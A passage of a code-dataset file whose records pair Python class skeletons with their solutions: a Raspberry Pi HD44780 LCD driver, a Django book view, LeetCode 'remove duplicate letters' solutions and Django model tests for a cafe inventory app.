<|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n<|end_body_0|>\n\n<|body_start_1|>\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n<|end_body_1|>\n\n<|body_start_2|>\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n<|end_body_2|>\n", "revision_id": "47f24116ebe3d9f7336431c20bde880d2e86793e", "skeleton": "<|skeleton|>\nclass Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. 
Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n <|body_0|>\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n <|body_1|>\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. If ``char_mode`` is set, holds the RS line high.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Screen:\n \"\"\"Driver for using HD44780 displays connected to Raspberry Pi GPIO. Presumes the R/W line is tied to ground. Also, doesn't yet control backlight.\"\"\"\n\n def __init__(self, pins=[], rs_pin=None, en_pin=None, debug=False, **kwargs):\n \"\"\"Initializes the GPIO-driven HD44780 display All GPIOs passed as arguments will be used with BCM mapping. Kwargs: * ``pins``: list of GPIO pins for driving display data bits in format [DB4, DB5, DB6, DB7] * ``en_pin``: EN pin GPIO number. Please, make sure it's pulled down to GND (10K is OK). Otherwise, block might start filling up the screen unexpectedly. * ``rs_pin``: RS pin GPIO number, * ``debug``: enables printing out LCD commands. * ``**kwargs``: all the other arguments, get passed further to HD44780 constructor\"\"\"\n self.debug = debug\n self.rs_pin = rs_pin\n self.en_pin = en_pin\n self.pins = pins\n GPIO.setmode(GPIO.BCM)\n if not self.debug:\n GPIO.setwarnings(False)\n GPIO.setup(self.en_pin, GPIO.OUT)\n GPIO.setup(self.rs_pin, GPIO.OUT)\n for pin in self.pins:\n GPIO.setup(pin, GPIO.OUT)\n HD44780.__init__(self, debug=self.debug, **kwargs)\n\n def write_byte(self, byte, char_mode=False):\n \"\"\"Takes a byte and sends the high nibble, then the low nibble (as per HD44780 doc). Passes ``char_mode`` to ``self.write4bits``.\"\"\"\n if self.debug and (not char_mode):\n print(hex(byte))\n self.write4bits(byte >> 4, char_mode)\n self.write4bits(byte & 15, char_mode)\n\n def write4bits(self, bits, char_mode=False):\n \"\"\"Writes a nibble to the display. 
If ``char_mode`` is set, holds the RS line high.\"\"\"\n bits = bin(bits)[2:][-4:].zfill(4)\n GPIO.output(self.rs_pin, char_mode)\n for index, bit in enumerate(bits[::-1]):\n GPIO.output(self.pins[index], int(bit))\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, True)\n delayMicroseconds(1)\n GPIO.output(self.en_pin, False)\n delayMicroseconds(1)\n", "source": "the_stack_v2_python_sparse", "source_path": "output/drivers/pi_gpio.py", "source_repo": "samkaufman01/pyLCI", "split": "test", "star_events_count": 1} {"blob_id": "a38edfb4d11a8be7b8b782cd0d8b2d74dcbd878a", "bodies": ["try:\n book = BookInfo.objects.get(pk=pk)\nexcept:\n return Http404('数据不存在')\nbook_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\nreturn JsonResponse(book_dict)", "param_dict = json.loads(request.body.decode())\nbtitle = param_dict.get('btitle')\nbpub_date = param_dict.get('bpub_date')\nbook = BookInfo.objects.get(pk=pk)\nbook.btitle = btitle\nbook.bpub_date = bpub_date\nbook.save()\nbook_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\nreturn JsonResponse(book_dict, status=201)", "book = BookInfo.objects.get(pk=pk)\nbook.delete()\nreturn JsonResponse({}, status=204)"], "bodies_text": "<|body_start_0|>\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n<|end_body_0|>\n\n<|body_start_1|>\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n<|end_body_1|>\n\n<|body_start_2|>\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "BookView", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BookView:\n\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n <|body_0|>\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n <|body_1|>\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n<|end_body_0|>\n\n<|body_start_1|>\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n<|end_body_1|>\n\n<|body_start_2|>\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000380", "length_bytes": 3452, "license_type": "permissive", "methods": [{"docstring": "根据主键查询一个对象", "name": "get", "signature": "def get(self, request, pk)"}, {"docstring": "修改指定主键的对象", "name": "put", "signature": "def put(self, request, pk)"}, {"docstring": "删除指定主键的对象", "name": "delete", "signature": "def delete(self, request, 
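The Screen record above drives an HD44780 in 4-bit mode: each byte is split into a high and a low nibble, the nibble is placed on DB4..DB7 LSB-first, and EN is pulsed to latch it. Below is a minimal sketch of that write path with RPi.GPIO replaced by a print-based stub so it runs without a Pi; the pin numbers in the demo call are illustrative assumptions, and the microsecond EN delays from the record are omitted.

class FakeGPIO:
    # Print-based stand-in for RPi.GPIO so the sketch runs on any host.
    OUT = "out"
    BCM = "bcm"
    def setmode(self, mode): pass
    def setup(self, pin, mode): pass
    def output(self, pin, value):
        print("pin %2d <- %d" % (pin, int(bool(value))))

GPIO = FakeGPIO()

def write4bits(pins, rs_pin, en_pin, bits, char_mode=False):
    # Same nibble encoding as the record: keep the low 4 bits, then drive
    # DB4..DB7 LSB-first; RS high selects character data.
    bits = bin(bits)[2:][-4:].zfill(4)
    GPIO.output(rs_pin, char_mode)
    for index, bit in enumerate(bits[::-1]):
        GPIO.output(pins[index], int(bit))
    for level in (False, True, False):  # EN pulse latches the nibble
        GPIO.output(en_pin, level)      # (the record inserts 1us delays here)

def write_byte(pins, rs_pin, en_pin, byte, char_mode=False):
    write4bits(pins, rs_pin, en_pin, byte >> 4, char_mode)    # high nibble first
    write4bits(pins, rs_pin, en_pin, byte & 0x0F, char_mode)  # then low nibble

# Pin numbers below are illustrative, not taken from the record.
write_byte(pins=[25, 24, 23, 18], rs_pin=7, en_pin=8, byte=ord("A"), char_mode=True)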
pk)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006171", "prompt": "Implement the Python class `BookView` described below.\n\nClass description:\nImplement the BookView class.\n\nMethod signatures and docstrings:\n- def get(self, request, pk): 根据主键查询一个对象\n- def put(self, request, pk): 修改指定主键的对象\n- def delete(self, request, pk): 删除指定主键的对象", "prompted_full_text": "Implement the Python class `BookView` described below.\n\nClass description:\nImplement the BookView class.\n\nMethod signatures and docstrings:\n- def get(self, request, pk): 根据主键查询一个对象\n- def put(self, request, pk): 修改指定主键的对象\n- def delete(self, request, pk): 删除指定主键的对象\n\n<|skeleton|>\nclass BookView:\n\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n <|body_0|>\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n <|body_1|>\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n<|end_body_0|>\n\n<|body_start_1|>\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n<|end_body_1|>\n\n<|body_start_2|>\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n<|end_body_2|>\n", "revision_id": "63ae6891d3be243c5c46329e65fcf47133c5890f", "skeleton": "<|skeleton|>\nclass BookView:\n\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n <|body_0|>\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n <|body_1|>\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BookView:\n def get(self, request, pk):\n \"\"\"根据主键查询一个对象\"\"\"\n try:\n book = BookInfo.objects.get(pk=pk)\n except:\n return Http404('数据不存在')\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict)\n\n def put(self, request, pk):\n \"\"\"修改指定主键的对象\"\"\"\n param_dict = json.loads(request.body.decode())\n btitle = param_dict.get('btitle')\n bpub_date = param_dict.get('bpub_date')\n book = BookInfo.objects.get(pk=pk)\n book.btitle = btitle\n book.bpub_date = bpub_date\n book.save()\n book_dict = {'id': book.id, 'btitle': book.btitle, 'bpub_date': book.bpub_date}\n return JsonResponse(book_dict, status=201)\n\n def delete(self, request, pk):\n \"\"\"删除指定主键的对象\"\"\"\n book = BookInfo.objects.get(pk=pk)\n book.delete()\n return JsonResponse({}, status=204)\n", "source": "the_stack_v2_python_sparse", "source_path": "pro_drf/demo1/booktest/views.py", "source_repo": "yongfang117/pro_useful_code", "split": "test", "star_events_count": 0} {"blob_id": "d23afe80842f6ed92145de531f1ed1e14d4f19fb", "bodies": ["remain = collections.Counter(s)\nstack = list()\nfor c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\nreturn ''.join(stack)", "rindex = {x: i for i, x in enumerate(s)}\nstack = list()\nfor i, x in enumerate(s):\n if x not in stack:\n while stack 
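Two things in the BookView record are worth flagging: Django treats Http404 as a 404 only when it is raised (the record returns it, so the client would receive the exception object rather than a 404 response), and the bare `except:` hides unrelated errors. A framework-free sketch of the corrected lookup pattern follows; the in-memory store and the stub Http404 class are assumptions standing in for Django.

class Http404(Exception):
    # Stub for django.http.Http404; in Django it must be *raised* so the
    # middleware converts it into a 404 response.
    pass

BOOKS = {1: {"id": 1, "btitle": "demo", "bpub_date": "2020-01-01"}}  # stand-in for BookInfo.objects

def get_book(pk):
    try:
        book = BOOKS[pk]
    except KeyError:  # in Django: except BookInfo.DoesNotExist, not a bare except
        raise Http404("object does not exist")
    return {"id": book["id"], "btitle": book["btitle"], "bpub_date": book["bpub_date"]}

print(get_book(1))
try:
    get_book(99)
except Http404 as exc:
    print("404:", exc)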
and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\nreturn ''.join(stack)"], "bodies_text": "<|body_start_0|>\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n<|end_body_0|>\n\n<|body_start_1|>\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n <|body_0|>\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n<|end_body_0|>\n\n<|body_start_1|>\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000381", "length_bytes": 1879, "license_type": "no_license", "methods": [{"docstring": "类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1", "name": "removeDuplicateLetters1", "signature": "def removeDuplicateLetters1(self, s: str) -> str"}, {"docstring": "记录每个字符最右的索引,用于是否从栈中弹出", "name": "removeDuplicateLetters2", "signature": "def removeDuplicateLetters2(self, s: str) -> str"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeDuplicateLetters1(self, s: str) -> str: 类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\n- def removeDuplicateLetters2(self, s: str) -> str: 记录每个字符最右的索引,用于是否从栈中弹出", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def removeDuplicateLetters1(self, s: str) -> str: 类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\n- def removeDuplicateLetters2(self, s: str) -> str: 记录每个字符最右的索引,用于是否从栈中弹出\n\n<|skeleton|>\nclass Solution:\n\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 
本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n <|body_0|>\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n<|end_body_0|>\n\n<|body_start_1|>\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n<|end_body_1|>\n", "revision_id": "2bbb1640589aab34f2bc42489283033cc11fb885", "skeleton": "<|skeleton|>\nclass Solution:\n\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n <|body_0|>\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def removeDuplicateLetters1(self, s: str) -> str:\n \"\"\"类似单调栈: 1.参考题解402. 本题中的letter的移除个数取决于重复的次数 2.遍历字符串,对于每个字符: a.已经在栈中,则无需继续判断,直接丢弃 b.不在栈中,如果栈顶元素字典序更大且后面还会出现,则丢弃栈顶元素 3.每遍历一个字符,其剩余出现次数-1\"\"\"\n remain = collections.Counter(s)\n stack = list()\n for c in s:\n if c not in stack:\n while stack and stack[-1] > c and (remain[stack[-1]] > 0):\n stack.pop()\n stack.append(c)\n remain[c] -= 1\n return ''.join(stack)\n\n def removeDuplicateLetters2(self, s: str) -> str:\n \"\"\"记录每个字符最右的索引,用于是否从栈中弹出\"\"\"\n rindex = {x: i for i, x in enumerate(s)}\n stack = list()\n for i, x in enumerate(s):\n if x not in stack:\n while stack and stack[-1] > x and (rindex[stack[-1]] > i):\n stack.pop()\n stack.append(x)\n return ''.join(stack)\n", "source": "the_stack_v2_python_sparse", "source_path": "316_remove-duplicate-letters.py", "source_repo": "helloocc/algorithm", "split": "test", "star_events_count": 1} {"blob_id": "cefbd0464db5762ad670394baf0502c961302603", "bodies": ["self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\nself.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\nself.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\nreport1 = Report.objects.create(caffe=self.caffe)\nreport2 = Report.objects.create(caffe=self.caffe)\nreport3 = Report.objects.create(caffe=self.caffe)\nreport4 = Report.objects.create(caffe=self.caffe)\nfirst_cat = Category.objects.create(name='first', caffe=self.caffe)\nsecond_cat = Category.objects.create(name='second', caffe=self.caffe)\ngram = Unit.objects.create(name='gram', caffe=self.caffe)\nliter = Unit.objects.create(name='liter', caffe=self.caffe)\nproduct1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\nproduct2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\nproduct3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\nproduct4 = Product.objects.create(name='product4', category=second_cat, unit=liter, 
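The Solution record implements LeetCode 316 (remove duplicate letters, i.e. the smallest subsequence containing each distinct character once) with a monotonic stack; its Chinese docstring says, roughly: skip characters already on the stack, pop a lexicographically larger stack top while it still occurs later in the string, and decrement each character's remaining count as it is consumed. A runnable restatement of the first variant with two spot checks:

import collections

def remove_duplicate_letters(s: str) -> str:
    remain = collections.Counter(s)  # occurrences not yet consumed
    stack = []
    for c in s:
        if c not in stack:
            # Pop a larger stack top only if it still occurs later.
            while stack and stack[-1] > c and remain[stack[-1]] > 0:
                stack.pop()
            stack.append(c)
        remain[c] -= 1
    return "".join(stack)

assert remove_duplicate_letters("bcabc") == "abc"
assert remove_duplicate_letters("cbacdcbc") == "acdb"
print("ok")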
caffe=self.caffe)\nFullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\nFullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\nFullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\nFullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)", "self.assertEqual(Report.objects.count(), 4)\nreport = Report.objects.first()\nself.assertEqual(report.caffe, self.caffe)", "report1 = Report.objects.get(id=1)\nproduct = FullProduct.objects.first().product\nwith self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)", "Report.objects.create(caffe=self.caffe, creator=self.user)\nwith self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)"], "bodies_text": "<|body_start_0|>\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n<|end_body_1|>\n\n<|body_start_2|>\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n<|end_body_2|>\n\n<|body_start_3|>\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n<|end_body_3|>\n", "class_docstring": "Report tests.", "class_name": "ReportModelTest", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n <|body_0|>\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n <|body_1|>\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with 
same product are not allowed.\"\"\"\n <|body_2|>\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly validated.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, caffe=self.caffe)\n product4 = Product.objects.create(name='product4', category=second_cat, unit=liter, caffe=self.caffe)\n FullProduct.objects.create(product=product1, amount=10, report=report1, caffe=self.caffe)\n FullProduct.objects.create(product=product2, amount=100, report=report2, caffe=self.caffe)\n FullProduct.objects.create(product=product3, amount=0, report=report3, caffe=self.caffe)\n FullProduct.objects.create(product=product4, amount=1000, report=report4, caffe=self.caffe)\n<|end_body_0|>\n\n<|body_start_1|>\n self.assertEqual(Report.objects.count(), 4)\n report = Report.objects.first()\n self.assertEqual(report.caffe, self.caffe)\n<|end_body_1|>\n\n<|body_start_2|>\n report1 = Report.objects.get(id=1)\n product = FullProduct.objects.first().product\n with self.assertRaises(Exception):\n FullProduct.objects.create(product=product, amount=1, report=report1)\n<|end_body_2|>\n\n<|body_start_3|>\n Report.objects.create(caffe=self.caffe, creator=self.user)\n with self.assertRaises(Exception):\n Report.objects.create(caffe=self.filtry, creator=self.user)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000382", "length_bytes": 14711, "license_type": "permissive", "methods": [{"docstring": "Data setup for tests.", "name": "setUp", "signature": "def setUp(self)"}, {"docstring": "Check creating reports.", "name": "test_create", "signature": "def test_create(self)"}, {"docstring": "Check if two fullproducts with same product are not allowed.", "name": "test_doubles", "signature": "def test_doubles(self)"}, {"docstring": "Check if Report model is properly validated.", "name": "test_report_validation", "signature": "def test_report_validation(self)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_005072", "prompt": "Implement the Python class `ReportModelTest` described below.\n\nClass description:\nReport tests.\n\nMethod signatures and docstrings:\n- def setUp(self): Data setup for tests.\n- def test_create(self): Check creating reports.\n- def test_doubles(self): Check if two fullproducts with same product are not allowed.\n- def test_report_validation(self): Check if Report model is properly validated.", "prompted_full_text": "Implement the Python class 
`ReportModelTest` described below.\n\nClass description:\nReport tests.\n\nMethod signatures and docstrings:\n- def setUp(self): Data setup for tests.\n- def test_create(self): Check creating reports.\n- def test_doubles(self): Check if two fullproducts with same product are not allowed.\n- def test_report_validation(self): Check if Report model is properly validated.\n\n<|skeleton|>\nclass ReportModelTest:\n \"\"\"Report tests.\"\"\"\n\n def setUp(self):\n \"\"\"Data setup for tests.\"\"\"\n <|body_0|>\n\n def test_create(self):\n \"\"\"Check creating reports.\"\"\"\n <|body_1|>\n\n def test_doubles(self):\n \"\"\"Check if two fullproducts with same product are not allowed.\"\"\"\n <|body_2|>\n\n def test_report_validation(self):\n \"\"\"Check if Report model is properly validated.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.caffe = Caffe.objects.create(name='kafo', city='Gliwice', street='Wieczorka', house_number='14', postal_code='44-100')\n self.filtry = Caffe.objects.create(name='filtry', city='Warszawa', street='Filry', house_number='14', postal_code='44-100')\n self.user = Employee.objects.create_user(username='admin', password='admin', caffe=self.caffe)\n report1 = Report.objects.create(caffe=self.caffe)\n report2 = Report.objects.create(caffe=self.caffe)\n report3 = Report.objects.create(caffe=self.caffe)\n report4 = Report.objects.create(caffe=self.caffe)\n first_cat = Category.objects.create(name='first', caffe=self.caffe)\n second_cat = Category.objects.create(name='second', caffe=self.caffe)\n gram = Unit.objects.create(name='gram', caffe=self.caffe)\n liter = Unit.objects.create(name='liter', caffe=self.caffe)\n product1 = Product.objects.create(name='product1', category=first_cat, unit=gram, caffe=self.caffe)\n product2 = Product.objects.create(name='product2', category=first_cat, unit=liter, caffe=self.caffe)\n product3 = Product.objects.create(name='product3', category=second_cat, unit=gram, 